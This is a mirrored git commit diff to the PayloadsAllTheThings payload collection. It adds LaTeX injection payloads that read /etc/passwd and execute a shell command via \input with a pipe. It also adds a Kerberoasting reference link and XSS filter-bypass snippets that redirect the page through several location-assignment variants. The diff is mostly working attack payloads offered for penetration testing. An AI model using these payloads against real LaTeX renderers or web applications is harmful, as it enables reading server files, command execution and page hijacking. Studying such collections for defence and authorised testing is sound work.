mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 13:25:27 +00:00
LaTeX display code + XSS location alternative
This commit is contained in:
parent
dcc5ebd3b6
commit
644724396f
@ -26,6 +26,13 @@ Read multiple lined file
|
|||||||
\closein\file
|
\closein\file
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Read text file, keep the formatting
|
||||||
|
```bash
|
||||||
|
\usepackage{verbatim}
|
||||||
|
\verbatiminput{/etc/passwd}
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Write file
|
## Write file
|
||||||
```bash
|
```bash
|
||||||
\newwrite\outfile
|
\newwrite\outfile
|
||||||
@ -48,6 +55,7 @@ If you get any LaTex error, consider using base64 to get the result without bad
|
|||||||
|
|
||||||
```bash
|
```bash
|
||||||
\input|ls|base4
|
\input|ls|base4
|
||||||
|
\input{|"/bin/hostname"}
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
@ -278,6 +278,7 @@ TODO
|
|||||||
|
|
||||||
### Kerberoast
|
### Kerberoast
|
||||||
```c
|
```c
|
||||||
|
https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf
|
||||||
https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/
|
https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/
|
||||||
https://room362.com/post/2016/kerberoast-pt1/
|
https://room362.com/post/2016/kerberoast-pt1/
|
||||||
|
|
||||||
|
@ -424,6 +424,14 @@ foo="text </script><script>alert(1)</script>";
|
|||||||
</script>
|
</script>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Bypass using an alternate way to redirect
|
||||||
|
```javascript
|
||||||
|
location="http://google.com"
|
||||||
|
document.location = "http://google.com"
|
||||||
|
document.location.href="http://google.com"
|
||||||
|
window.location.assign("http://google.com")
|
||||||
|
window['location']['href']="http://google.com"
|
||||||
|
```
|
||||||
|
|
||||||
Bypass using an alternate way to execute an alert - [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040)
|
Bypass using an alternate way to execute an alert - [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040)
|
||||||
```javascript
|
```javascript
|
||||||
|
Loading…
Reference in New Issue
Block a user